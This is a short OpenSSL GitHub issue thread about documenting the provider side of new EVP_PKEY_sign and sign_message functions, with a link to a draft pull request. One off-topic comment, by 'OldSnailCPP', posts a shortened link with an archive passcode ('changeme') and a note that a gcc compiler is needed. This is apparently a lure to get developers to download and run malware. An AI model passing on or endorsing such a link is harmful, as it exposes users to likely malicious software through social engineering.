### ISSUE TITLE
Document provider side of the new EVP_PKEY_sign / EVP_PKEY_sign_message / etc functions

### ISSUE THREAD

**Issue by levitte** [openssl/project#828]
This amends the documentation of the new provider side functions, in `doc/man7/provider-signature.md`

**Comment by OldSnailCPP** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by levitte** [comment]
PR: openssl/openssl#25423

(currently in draft, which is why this issue is still "In Progress")
